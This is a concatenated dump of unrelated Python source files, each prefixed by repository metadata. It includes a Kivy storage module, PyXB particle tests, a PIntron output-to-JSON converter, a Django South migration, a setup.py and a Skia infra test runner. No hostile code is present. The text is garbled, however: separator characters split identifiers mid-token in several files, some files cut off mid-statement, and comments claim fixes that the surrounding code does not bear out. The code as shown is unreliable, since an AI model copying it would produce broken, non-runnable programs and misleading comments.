# (Fixes the garbled "f | asta" literal, which made the fasta branch dead.)
if seq_format == "genbank":
    res = SeqIO.index_db(db_file, filenames=fnames, format=seq_format)
elif seq_format == "fasta":
    # FASTA ids look like gi|123|ref|NC_000001.1| -- key on field 3.
    get_index = lambda name: name.split('|')[3]
    res = SeqIO.index_db(db_file, filenames=fnames, format=seq_format,
                         key_function=get_index)
else:
    # Parenthesised print works as a statement (py2) or a call (py3).
    print("Only genbank and fasta formats are accepted!")
    sys.exit(1)
|
zennobjects/kivy | kivy/storage/__init__.py | Python | mit | 11,191 | 0.001072 | '''
Storage
=======
.. versionadded:: 1.7.0
.. warning::
This module is still experimental, and the API is subject to change in a
future version.
Usage
-----
The idea behind the Storage module is to be able to load/store keys-value pairs.
The default model is abstract so you cannot use it directly. We provide some
implementations such as:
- :class:`kivy.storage.dictstore.DictStore`: use a python dict as a store
- :class:`kivy.storage.jsonstore.JsonStore`: use a JSON file as a store
- :class:`kivy.storage.redistore.RedisStore`: use a `Redis <http://redis.io>`_
database with `redis-py <https://github.com/andymccurdy/redis-py>`_
Examples
--------
For example, let's use a JsonStore::
from kivy.storage.jsonstore import JsonStore
store = JsonStore('hello.json')
# put some values
store.put('tito', name='Mathieu', age=30)
store.put('tshirtman', name='Gabriel', age=27)
# get from a key
print('tito is', store.get('tito'))
# or guess the key/entry for a part of the key
key, tshirtman = store.find(name='Gabriel')
print('tshirtman is', tshirtman)
Because the data is persistant, you can check later to see if the key exists::
from kivy.storage.jsonstore import JsonStore
store = JsonStore('hello.json')
if store.exists('tite'):
print('tite exists:', store.get('tito'))
store.delete('tito')
Synchronous / Asynchronous API
------------------------------
All the standard methods (:meth:`~AbstractStore.get`, :meth:`~AbstractStore.put`
, :meth:`~AbstractStore.exists`, :meth:`~AbstractStore.delete`,
:meth:`~AbstractStore.find`) have an asynchronous version.
For example, the *get* method has a `callback` parameter. If set, the `callback`
will be used
to return the result to the user when available: the request will be
asynchronous. If the `callback` is None, then the request will be synchronous
and the result will be returned directly.
Without callback (Synchronous API)::
entry = mystore.get('tito')
print('tito =', entry)
With callback (Asynchronous API)::
def my_callback(store, key, entry):
print('the key', key, 'have', entry)
mystore.get('plop', callback=my_callback)
The callback signature is (for almost all methods) `callback(store, key,
result)`::
#. `store` is the `Store` instance currently used.
#. `key` is the key to search for.
#. `entry` is the result of the lookup for the `key`.
Synchronous container type
--------------------------
The storage API emulates the container type for the synchronous API::
store = JsonStore('hello.json')
# original: store.get('tito')
store['tito']
# original: store.put('tito', name='Mathieu')
store['tito'] = {'name': 'Mathieu'}
# original: store.delete('tito')
del store['tito']
# original: store.count()
len(store)
# original: store.exists('tito')
'tito' in store
# original: for key in store.keys()
for key in store:
pass
'''
from kivy.clock import Clock
from kivy.event import EventDispatcher
from functools import partial
class AbstractStore(EventDispatcher):
'''Abstract class used to implement a Store
'''
    def __init__(self, **kwargs):
        # Forward construction kwargs to EventDispatcher, then load the
        # backing store immediately so the instance is ready for use.
        super(AbstractStore, self).__init__(**kwargs)
        self.store_load()
    def exists(self, key):
        '''Check if a key exist in the store.

        Delegates to the concrete ``store_exists`` hook.
        '''
        return self.store_exists(key)
    def async_exists(self, callback, key):
        '''Asynchronous version of :meth:`exists`.

        :Callback arguments:
            `store`: :class:`AbstractStore` instance
                Store instance
            `key`: string
                Name of the key to search for
            `result`: bool
                Result of the query, None if any error
        '''
        self._schedule(self.store_exists_async,
                key=key, callback=callback)
    def get(self, key):
        '''Get the value stored at `key`. If the key is not found, a
        `KeyError` exception will be thrown.

        Delegates to the concrete ``store_get`` hook.
        '''
        return self.store_get(key)
    def async_get(self, callback, key):
        '''Asynchronous version of :meth:`get`.

        :Callback arguments:
            `store`: :class:`AbstractStore` instance
                Store instance
            `key`: string
                Name of the key to search for
            `result`: dict
                Result of the query, None if any error
        '''
        self._schedule(self.store_get_async, key=key, callback=callback)
def put(self, key, **values):
'''Put a new key/value in the storage
'''
need_sync = self.store_put(key, values)
if need_sync:
self.store_sync()
return need_sync
    def async_put(self, callback, key, **values):
        '''Asynchronous version of :meth:`put`.

        :Callback arguments:
            `store`: :class:`AbstractStore` instance
                Store instance
            `key`: string
                Name of the key that was written
            `result`: bool
                Indicate True if the storage has been updated, or False if
                nothing has been done (no changes). None if any error.
        '''
        self._schedule(self.store_put_async,
                key=key, value=values, callback=callback)
def delete(self, key):
'''Delete a key from the storage. If the key is not found, a `KeyError`
exception will be thrown.'''
need_sync = self.store_delete(key)
if need_sync:
self.store_sync()
return need_sync
    def async_delete(self, callback, key):
        '''Asynchronous version of :meth:`delete`.

        :Callback arguments:
            `store`: :class:`AbstractStore` instance
                Store instance
            `key`: string
                Name of the key to search for
            `result`: bool
                Indicate True if the storage has been updated, or False if
                nothing has been done (no changes). None if any error.
        '''
        self._schedule(self.store_delete_async, key=key,
                callback=callback)
    def find(self, **filters):
        '''Return all the entries matching the filters. The entries are given
        through a generator as a list of (key, entry) pairs::

            for key, entry in store.find(name='Mathieu'):
                print('entry:', key, '->', entry)

        Because it's a generator, you cannot directly use it as a list. You can
        do::

            # get all the (key, entry) availables
            entries = list(store.find(name='Mathieu'))
            # get only the entry from (key, entry)
            entries = list((x[1] for x in store.find(name='Mathieu')))
        '''
        return self.store_find(filters)
    def async_find(self, callback, **filters):
        '''Asynchronous version of :meth:`find`.

        The callback will be called for each entry in the result.

        :Callback arguments:
            `store`: :class:`AbstractStore` instance
                Store instance
            `key`: string
                Name of the key to search for, or None if we reach the end of
                the results
            `result`: bool
                Indicate True if the storage has been updated, or False if
                nothing has been done (no changes). None if any error.
        '''
        self._schedule(self.store_find_async,
                callback=callback, filters=filters)
    def keys(self):
        '''Return a list of all the keys in the storage
        (delegates to the concrete ``store_keys`` hook).
        '''
        return self.store_keys()
    def async_keys(self, callback):
        '''Asynchronously return all the keys in the storage
        (result is delivered through *callback*).
        '''
        self._schedule(self.store_keys_async, callback=callback)
    def count(self):
        '''Return the number of entries in the storage
        (delegates to the concrete ``store_count`` hook).
        '''
        return self.store_count()
    def async_count(self, callback):
        '''Asynchronously return the number of entries in the storage
        (result is delivered through *callback*).
        '''
        self._schedule(self.store_count_async, callback=callback)
def clear(self):
'''Wipe the whole storage.
'''
return self.store |
jonfoster/pyxb1 | tests/drivers/test-particle.py | Python | apache-2.0 | 4,830 | 0.007453 | import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
# Generate Python bindings from the particle test schema at import time
# and exec them into this module's namespace; this defines the element
# classes (h01, h01b, h11, h24, h24b, ...) exercised by TestParticle.
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
                              '../schemas/particle.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
from pyxb.utils import domutils
def ToDOM (instance, tag=None):
    """Serialize a binding *instance* and return its DOM document element.

    *tag* is accepted for call-site compatibility but unused.
    """
    dom_document = instance.toDOM()
    return dom_document.documentElement
class TestParticle (unittest.TestCase):
    """Exercise minOccurs/maxOccurs handling of the generated bindings.

    The element names encode the occurrence bounds of their `elt` child:
    h01/h01b allow 0..1, h11 requires exactly 1, h24/h24b allow 2..4.

    (Fixes two garbled tokens: `"URN:test"/ | >` and `assert_( | instance`.)
    """

    def test_bad_creation (self):
        xml = '<h01 xmlns="URN:test"/>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        # Creating with wrong element
        self.assertRaises(pyxb.StructuralBadDocumentError, h01b.createFromDOM, dom.documentElement)

    def test_h01_empty (self):
        xml = '<ns1:h01 xmlns:ns1="URN:test"/>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        instance = h01.createFromDOM(dom.documentElement)
        self.assert_(instance.elt is None)
        self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)

    def test_h01_elt (self):
        xml = '<ns1:h01 xmlns:ns1="URN:test"><elt/></ns1:h01>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        instance = h01.createFromDOM(dom.documentElement)
        self.assert_(instance.elt is not None)
        self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)

    def test_h01_elt2 (self):
        # Two children exceed maxOccurs=1.
        xml = '<h01 xmlns="URN:test"><elt/><elt/></h01>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        self.assertRaises(ExtraContentError, h01.createFromDOM, dom.documentElement)

    def test_h01b_empty (self):
        xml = '<ns1:h01b xmlns:ns1="URN:test"/>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        instance = h01b.createFromDOM(dom.documentElement)
        self.assert_(instance.elt is None)
        self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)

    def test_h01b_elt (self):
        xml = '<ns1:h01b xmlns:ns1="URN:test"><elt/></ns1:h01b>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        instance = h01b.createFromDOM(dom.documentElement)
        self.assert_(instance.elt is not None)
        self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)

    def test_h01b_elt2 (self):
        xml = '<ns1:h01b xmlns:ns1="URN:test"><elt/><elt/></ns1:h01b>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        self.assertRaises(ExtraContentError, h01b.createFromDOM, dom.documentElement)

    def test_h11_empty (self):
        # minOccurs=1: an empty element is a missing-content error.
        xml = '<ns1:h11 xmlns:ns1="URN:test"/>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        self.assertRaises(MissingContentError, h11.createFromDOM, dom.documentElement)

    def test_h11_elt (self):
        xml = '<ns1:h11 xmlns:ns1="URN:test"><elt/></ns1:h11>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        instance = h11.createFromDOM(dom.documentElement)
        self.assert_(instance.elt is not None)
        self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)

    def test_h24 (self):
        xml = '<h24 xmlns="URN:test"></h24>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        self.assertRaises(MissingContentError, h24.createFromDOM, dom.documentElement)
        # 0..1 children: missing content; 2..4: accepted round-trip.
        # NOTE(review): range(0, 5) never reaches the ExtraContentError
        # branch (num_elt > 4); extend the range to cover it.
        for num_elt in range(0, 5):
            xml = '<ns1:h24 xmlns:ns1="URN:test">%s</ns1:h24>' % (''.join(num_elt * ['<elt/>']),)
            dom = pyxb.utils.domutils.StringToDOM(xml)
            if 2 > num_elt:
                self.assertRaises(MissingContentError, h24.createFromDOM, dom.documentElement)
            elif 4 >= num_elt:
                instance = h24.createFromDOM(dom.documentElement)
                self.assertEqual(num_elt, len(instance.elt))
                self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
            else:
                self.assertRaises(ExtraContentError, h24.createFromDOM, dom.documentElement)

    def test_h24b (self):
        xml = '<ns1:h24b xmlns:ns1="URN:test"></ns1:h24b>'
        dom = pyxb.utils.domutils.StringToDOM(xml)
        self.assertRaises(MissingContentError, h24b.createFromDOM, dom.documentElement)
        for num_elt in range(0, 5):
            xml = '<ns1:h24b xmlns:ns1="URN:test">%s</ns1:h24b>' % (''.join(num_elt * ['<elt/>']),)
            dom = pyxb.utils.domutils.StringToDOM(xml)
            if 2 > num_elt:
                self.assertRaises(MissingContentError, h24b.createFromDOM, dom.documentElement)
            elif 4 >= num_elt:
                instance = h24b.createFromDOM(dom.documentElement)
                self.assertEqual(num_elt, len(instance.elt))
                self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
            else:
                self.assertRaises(ExtraContentError, h24b.createFromDOM, dom.documentElement)
# Run the binding tests when this module is executed as a script.
if __name__ == '__main__':
    unittest.main()
|
AlgoLab/PIntron-scripts | Postprocessing/pintron-output-2-json.py | Python | agpl-3.0 | 9,511 | 0.001787 | #!/usr/bin/env python
from __future__ import print_function
import argparse
import contextlib
import gzip
import json
import logging
import re
import sys
@contextlib.contextmanager
def smart_open_out(filename=None):
    """Yield a writable handle for *filename*, gzip-compressing '*.gz' names.

    With no filename (or '-') the handle is stdout, which is never closed.
    """
    use_stdout = not filename or filename == '-'
    if use_stdout:
        name, raw, handle = "<stdout>", sys.stdout, sys.stdout
    else:
        name = filename
        raw = open(filename, 'w')
        if filename.endswith(".gz"):
            handle = gzip.GzipFile(name, 'wb', 9, raw)
        else:
            handle = raw
    try:
        yield handle
    finally:
        # Close the gzip wrapper first (flushes), then the underlying file.
        if handle is not raw:
            handle.close()
        if raw is not sys.stdout:
            raw.close()
def parse_est_fasta_header(line):
    """Extract the GenBank identifier from an EST FASTA header line.

    If the header carries a '/gb=' annotation, return the accession that
    follows it; otherwise return the whole header line unchanged.
    """
    identifier = line
    if '/gb=' in identifier:
        # Raw string: the original pattern '\/gb=...' relied on the invalid
        # escape sequence '\/', which raises a SyntaxWarning on modern Python.
        match = re.search(r'/gb=([A-Z_0-9:]+)', identifier)
        # Guard against a '/gb=' that is not followed by accession characters;
        # the original would crash with AttributeError on match.groups().
        if match:
            identifier = match.group(1)
    return identifier
def parse_block_alignment_str(line, genomic_block):
    """Parse one whitespace-separated alignment-block line into a dict.

    Adds absolute genomic coordinates derived from *genomic_block*'s
    start/end and strand.
    """
    t_start, t_end, g_start, g_end, t_seq, g_seq = line.split()[:6]
    block = {
        'transcript_start': int(t_start),
        'transcript_end': int(t_end),
        'genomic_relative_start': int(g_start),
        'genomic_relative_end': int(g_end),
        'transcript_sequence': t_seq,
        'genomic_sequence': g_seq,
    }
    if genomic_block['strand'] == '+':
        origin = genomic_block['start']
        block['genomic_absolute_start'] = origin + block['genomic_relative_start']
        block['genomic_absolute_end'] = origin + block['genomic_relative_end']
    else:
        # Minus strand: coordinates count backwards from the block end.
        origin = genomic_block['end']
        block['genomic_absolute_start'] = origin - block['genomic_relative_start'] + 1
        block['genomic_absolute_end'] = origin - block['genomic_relative_end'] + 1
    return block
def pintron_alignments(alignments, genomic_block):
    """Yield one {'identifier', 'blocks'} dict per EST record in the stream."""
    current = None
    for raw_line in alignments:
        stripped = raw_line.strip()
        if stripped.startswith(">"):
            # New sequence header: flush the previous record, start a new one.
            if current:
                yield current
            current = {'identifier': parse_est_fasta_header(stripped),
                       'blocks': []}
        elif stripped.startswith("#"):
            # Annotation lines are currently ignored.
            continue
        elif stripped[0].isdigit():
            # Numeric lines describe an alignment block of the current record.
            assert(current)
            current['blocks'].append(parse_block_alignment_str(stripped, genomic_block))
    if current:
        yield current
def parse_genomic_header(line):
    """Parse a 'seqname:start:end:strand' header into a coordinate dict."""
    seqname, start, end, strand_token = line.split(":")[:4]
    # The strand field is '+' or '-'; appending '1' turns it into a signed int.
    strand = "+" if int(strand_token + "1") > 0 else "-"
    return {'seqname': seqname,
            'start': int(start),
            'end': int(end),
            'strand': strand}
def parse_introns(introns_stream, genomic_block, alignments):
    """Parse PIntron's predicted-introns TSV stream into a list of dicts.

    Each line is a tab-separated record of 20 fields; *alignments* maps
    transcript identifier -> alignment dict (as built by pintron_alignments)
    and is used to attach the flanking-exon alignment of every supporting
    transcript to its intron.
    """
    introns = []
    for identifier, line in enumerate(introns_stream):
        # Synthetic stable identifier: Int0, Int1, ... in file order.
        intron = {"identifier": "Int{0}".format(identifier)}
        (intron['relative_start'], intron['relative_end'],
        intron['absolute_start'], intron['absolute_end'],
        intron['length'],
        intron['number_of_supporting_transcripts'], seq_list,
        intron['donor_alignment_error'], intron['acceptor_alignment_error'],
        intron['donor_score'], intron['acceptor_score'],
        intron['BPS_score'], intron['BPS_position'],
        intron['type'], intron['pattern'], intron['repeat_sequence'],
        intron['donor_exon_suffix'], intron['prefix'], intron['suffix'],
        intron['acceptor_exon_prefix']) = line.rstrip().split("\t")
        # seq_list is a comma-separated list of transcript ids; the empty-string
        # filter handles trailing commas / empty fields.
        intron["supporting_transcripts"] = {i: {} for i in seq_list.split(',') if i != ''}
        for field in ('relative_start', 'relative_end',
                'absolute_start', 'absolute_end',
                'length', 'number_of_supporting_transcripts',
                'BPS_position'):
            intron[field] = int(intron[field])
        # a bug in PIntron (file predicted-introns.txt) causes to report absolute
        # coordinates of introns on strand '+' shifted to the left of 1bp
        if genomic_block['strand'] == "+":
            intron['absolute_start'] = intron['absolute_start'] + 1
            intron['absolute_end'] = intron['absolute_end'] + 1
        for field in ('donor_alignment_error', 'acceptor_alignment_error',
                'donor_score', 'acceptor_score', 'BPS_score'):
            intron[field] = float(intron[field])
        # A negative BPS position means "no branch point site found".
        if intron['BPS_position'] < 0:
            del intron['BPS_position']
        introns.append(intron)
    # for each intron, add the alignment of the surrounding exons.
    # Since different factorizations can support the same intron, the first
    # step is to find all pairs of exons supporting an intron
    def supporting_factors(intron):
        # Returns (transcript id, donor exon, acceptor exon) triples for every
        # transcript whose factorization has exactly one exon ending right
        # before the intron and one starting right after it.
        pairs = []
        for identifier in intron["supporting_transcripts"].keys():
            factor = alignments[identifier]
            good_left = [exon for exon in factor['blocks']
                    if exon['genomic_relative_end'] == intron['relative_start'] - 1]
            good_right = [exon for exon in factor['blocks']
                    if exon['genomic_relative_start'] == intron['relative_end'] + 1]
            if len(good_left) == 1 and len(good_right) == 1:
                pairs.append((identifier, good_left[0], good_right[0]))
            else:
                logging.error("Could not find a supporting alignment of " +
                        "transcript %s for intron %s",
                        identifier, intron['identifier'])
        assert len(pairs) == intron['number_of_supporting_transcripts']
        return pairs
    #
    # Each intron has the list of supporting_transcripts.
    # For each such seq we provide the suffix/prefix of the prev/next exon
    for intron in introns:
        for [seq, donor_factor, acceptor_factor] in supporting_factors(intron):
            intron['supporting_transcripts'][seq] = {
                'donor_factor_suffix':
                    donor_factor['transcript_sequence'][-len(intron['donor_exon_suffix']):],
                'acceptor_factor_prefix':
                    acceptor_factor['transcript_sequence'][:len(intron['acceptor_exon_prefix'])],
                'acceptor_factor_start': acceptor_factor['transcript_start'],
                'donor_factor_end': donor_factor['transcript_end'],
                'acceptor_factor_end': acceptor_factor['transcript_end'],
                'donor_factor_start': donor_factor['transcript_start'],
            }
    return introns
def convert_to_dict(genomic_file, alignment_file, introns_file):
    """Assemble genomic header, alignments and introns into a single dict."""
    logging.info("Parsing genomic coordinates from file '%s'", genomic_file.name)
    header_line = genomic_file.readline().strip().lstrip(">")
    genomic_block = parse_genomic_header(header_line)
    logging.info("Reading results from genomic region: %s:%d:%d:%s",
                 genomic_block["seqname"],
                 genomic_block["start"], genomic_block["end"], genomic_block["strand"])
    logging.info("Parsing alignments from file '%s'", alignment_file.name)
    alignments = {}
    for alignment in pintron_alignments(alignment_file, genomic_block):
        alignments[alignment['identifier']] = alignment
    logging.info("Read %d alignments", len(alignments))
    logging.info("Parsing predicted introns from file '%s'", introns_file.name)
    introns = parse_introns(introns_file, genomic_block, alignments)
    logging.info("Read %d introns", len(introns))
    return {'genome': genomic_block,
            'introns': introns,
            'alignments': alignments}
def main():
parser = argparse.ArgumentParser(
description="Convert PIntron results to a more convenient JSON format",
formatter_class=argparse.Ar | gumentDefaultsHelpFormatter
)
parser.add_argument(
'-g', '--pintron-genomic-file',
help="File containing the genomic sequence given as input to PIntron",
metavar="FILE",
type=argparse.FileType(mode='r'),
default='genomic.txt')
parser.add_argument(
'-a', '--pintron-align-file',
help="File containing the alignments computed by PIntron after the intron agreement step",
metavar="FILE",
type=argparse.FileType(mode='r'),
default='out-after-intron-agree.txt')
|
InScience/DAMIS-old | src/damis/migrations/0025_auto__del_field_task_sequence__del_field_task_stderr__del_field_task_s.py | Python | agpl-3.0 | 11,099 | 0.007208 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: drop legacy per-task execution columns, add is_workflow_start."""
        # Deleting field 'Task.sequence'
        db.delete_column(u'damis_task', 'sequence')

        # Deleting field 'Task.stderr'
        db.delete_column(u'damis_task', 'stderr')

        # Deleting field 'Task.stdout'
        db.delete_column(u'damis_task', 'stdout')

        # Deleting field 'Task.processors'
        db.delete_column(u'damis_task', 'processors')

        # Adding field 'Task.is_workflow_start'
        db.add_column(u'damis_task', 'is_workflow_start',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)
    def backwards(self, orm):
        """Revert: restore the dropped columns (as nullable) and remove is_workflow_start.

        NOTE(review): original column data is lost on forwards(); backwards()
        only recreates empty nullable columns.
        """
        # Adding field 'Task.sequence'
        db.add_column(u'damis_task', 'sequence',
                      self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
                      keep_default=False)

        # Adding field 'Task.stderr'
        db.add_column(u'damis_task', 'stderr',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)

        # Adding field 'Task.stdout'
        db.add_column(u'damis_task', 'stdout',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)

        # Adding field 'Task.processors'
        db.add_column(u'damis_task', 'processors',
                      self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
                      keep_default=False)

        # Deleting field 'Task.is_workflow_start'
        db.delete_column(u'damis_task', 'is_workflow_start')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'damis.algorithm': {
'Meta': {'object_name': 'Algorithm'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
| 'executable_file': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_le | ngth': '100'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.dataset': {
'Meta': {'object_name': 'Dataset'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'license': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['damis.License']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.experiment': {
'Meta': {'object_name': 'Experiment'},
'finish': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'CREATED'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'experiments'", 'null': 'True', 'to': u"orm['auth.User']"}),
'workflow_state': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'damis.license': {
'Meta': {'object_name': 'License' |
SalesforceFoundation/mrbelvedereci | metaci/plan/migrations/0017_merge_20180911_1915.py | Python | bsd-3-clause | 329 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-09-11 19:15
from __ | future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Empty merge migration: declares both divergent 0016 migrations as
    # dependencies so Django sees a single linear migration history.

    dependencies = [
        ("plan", "0016_plan_test_dashboard"),
        ("plan", "0016_auto_20180904_1457"),
    ]

    operations = []
|
iglpdc/dmrg_helpers | setup.py | Python | mit | 912 | 0.048246 | #!/usr/bin/env python
from distutils.core import setup
from version import __version__
# Package metadata. Classifier strings must match the official PyPI trove
# classifier list exactly, otherwise upload tools reject or ignore them.
setup(name='dmrg_helpers',
      version=__version__,
      description='Python helpers from our main DMRG code',
      long_description=open('README.md').read(),
      author='Ivan Gonzalez',
      author_email='iglpdc@gmail.com',
      url='https://github.com/iglpdc/dmrg_helpers',
      license='MIT',
      classifiers=[
          # Fixed to valid trove classifiers ('Enviroment', '0 - Beta',
          # 'MIT license', 'Natural language', 'Programming Language::'
          # were all invalid spellings).
          'Environment :: Console',
          'Development Status :: 4 - Beta',
          'Intended Audience :: Developers',
          'Intended Audience :: Science/Research',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Programming Language :: Python',
          'Topic :: Scientific/Engineering',
          'Topic :: Scientific/Engineering :: Physics',
      ],
      # list all subdirectories in next list
      # 'NAME.core' was an unreplaced project-template placeholder.
      packages = ['dmrg_helpers', 'dmrg_helpers.core',
                  'dmrg_helpers.utils'],
      py_modules = ['version'],
      requires = [],
      )
|
HalCanary/skia-hc | infra/bots/infra_tests.py | Python | bsd-3-clause | 1,839 | 0.014138 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run all infrastructure-related tests."""
import os
import subprocess
import sys
INFRA_BOTS_DIR = os.pa | th.dirname(os.path.realpath(__file__))
SKIA_DIR = os.path.abspath(os.path.join(INFRA_BOTS_DIR, os.pardir, os.pardir))
def test(cmd, cwd):
try:
subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
return e.output
def python_unit_tests(train):
  """Discover and run the Python unit tests; skipped entirely when training."""
  if train:
    return None
  cmd = ['python', '-m', 'unittest', 'discover', '-s', '.', '-p', '*_test.py']
  return test(cmd, INFRA_BOTS_DIR)
def recipe_test(train):
  """Run the recipe simulation tests ('train' regenerates expectations)."""
  cmd = ['python', os.path.join(INFRA_BOTS_DIR, 'recipes.py'), 'test',
         'train' if train else 'run']
  return test(cmd, SKIA_DIR)
def gen_tasks_test(train):
  """Run gen_tasks.go; '--test' checks output instead of regenerating it."""
  cmd = ['go', 'run', 'gen_tasks.go']
  if not train:
    cmd.append('--test')
  try:
    return test(cmd, INFRA_BOTS_DIR)
  except OSError:
    # 'go' itself was not found on PATH.
    return ('Failed to run "%s"; do you have Go installed on your machine?'
            % ' '.join(cmd))
def main():
  """Run every infra test, print any failures, and exit non-zero on failure.

  Passing '--train' regenerates recipe/task expectations instead of checking
  them. NOTE: this file uses Python 2 print statements.
  """
  train = False
  if '--train' in sys.argv:
    train = True
  tests = (
      python_unit_tests,
      recipe_test,
      gen_tasks_test,
  )
  # Each test returns None on success or its captured output on failure.
  errs = []
  for t in tests:
    err = t(train)
    if err:
      errs.append(err)
  if len(errs) > 0:
    print >> sys.stderr, 'Test failures:\n'
    for err in errs:
      print >> sys.stderr, '=============================='
      print >> sys.stderr, err
      print >> sys.stderr, '=============================='
    sys.exit(1)
  if train:
    print 'Trained tests successfully.'
  else:
    print 'All tests passed!'


